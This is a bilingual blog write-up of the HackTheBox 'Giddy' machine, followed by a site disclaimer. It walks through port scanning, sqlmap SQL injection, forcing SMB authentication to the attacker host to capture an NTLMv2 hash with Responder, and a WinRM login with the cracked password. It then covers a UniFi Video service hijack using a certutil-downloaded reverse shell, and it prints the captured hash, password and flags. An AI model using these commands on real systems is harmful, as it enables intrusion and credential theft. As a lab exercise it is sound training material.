Information Gathering

IP Address	Opening Ports
10.10.10.104	TCP:80,443,3389

$ ip='10.10.10.104'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: 2025-03-14T03:39:25+00:00; -18m07s from scanner time.
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-14T03:39:25+00:00; -18m08s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: GIDDY
|   NetBIOS_Domain_Name: GIDDY
|   NetBIOS_Computer_Name: GIDDY
|   DNS_Domain_Name: Giddy
|   DNS_Computer_Name: Giddy
|   Product_Version: 10.0.14393
|_  System_Time: 2025-03-14T03:39:17+00:00
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2025-03-13T03:33:05
|_Not valid after:  2025-09-12T03:33:05
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Windows PowerShell Web Access SQLI && Out-of-Band Data Exfiltration && NTLM-V2

# echo '10.10.10.104 giddy.htb'>>/etc/hosts

$ feroxbuster -u 'http://giddy.htb'

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图

http://giddy.htb/Remote/en-US/logon.aspx?ReturnUrl=%2fRemote%2f

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图1

http://giddy.htb/mvc/

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图2

$ sqlmap -u 'http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1' -dump --batch

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图3

$ sqlmap -u "http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=1" --sql-query "EXEC MASTER.sys.xp_dirtree '\\\\10.10.16.33\\share'" --batch

$ responder -I tun0

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图4

Stacy::GIDDY:87a923d765a8db30:6AD2E27D1AA6627209D5E141E4756AFD:0101000000000000002D7C41DA94DB01A5E36FED99194C60000000000200080030004B003900500001001E00570049004E002D004A004400300033004E0043003400350039003400360004003400570049004E002D004A004400300033004E004300340035003900340036002E0030004B00390050002E004C004F00430041004C000300140030004B00390050002E004C004F00430041004C000500140030004B00390050002E004C004F00430041004C0007000800002D7C41DA94DB0106000400020000000800300030000000000000000000000000300000BE837E86F4FAFD3C8FA9F65A4962CAA5E70A4DE45B90CD7D2B64F70E931E169B0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0033003300000000000000000000000000

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图5

password:xNnWo6272k7x

$ evil-winrm -i 10.10.10.104 -u 'giddy\stacy' -p 'xNnWo6272k7x'

User.txt

53808bfee1c938401f62ff12e0cf17bc

Privilege Escalation:UniFi Video && Chameleon Reverse Shell

UniFi Video 是 Ubiquiti Networks 以前推出的一款视频监控管理软件，用于管理和录制 UniFi 系列的摄像头（IP Cameras）。它主要用于本地部署的视频监控系统，允许用户在本地或远程访问摄像头的实时视频流和录像存储。

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图6

https://www.exploit-db.com/exploits/43390

在服务“Ubiquiti UniFi Video”启动时，它会尝试在 C:\ProgramData\unifi-video\ 中执行一个名为 taskkill.exe 的文件

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图7

切换到 Windows 服务的注册表目录

*Evil-WinRM* PS C:\ProgramData\unifi-video> Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'

$ icacls C:\ProgramData\unifi-video\

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图8

列出所有包含 "UniFi" 的服务

*Evil-WinRM* PS HKLM:\SYSTEM\CurrentControlSet\Services> dir *UniFi*

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图9

https://github.com/MartinxMax/Chameleon

# docker run --rm -v /home/maptnh/Desktop/HTB/Chameleon/reverseshell:/tmp chameleon -gcc reverse_win.c

*Evil-WinRM* PS C:\ProgramData\unifi-video> certutil -urlcache -f http://10.10.16.33/reverse_win_win_x86_64.exe taskkill.exe

重启服务

*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"

*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…插图10

Root.txt

617e9b8600be08870d099e98e5359f74

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…

Information Gathering

Windows PowerShell Web Access SQLI && Out-of-Band Data Exfiltration && NTLM-V2

User.txt

Privilege Escalation:UniFi Video && Chameleon Reverse Shell

Root.txt

相关文章

发布评论取消回复

[Meachines] [Medium] Giddy Windows PowerShell Web+OOB-SMB凭证泄露+Chameleon-She…

Information Gathering

Windows PowerShell Web Access SQLI && Out-of-Band Data Exfiltration && NTLM-V2

User.txt

Privilege Escalation:UniFi Video && Chameleon Reverse Shell

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复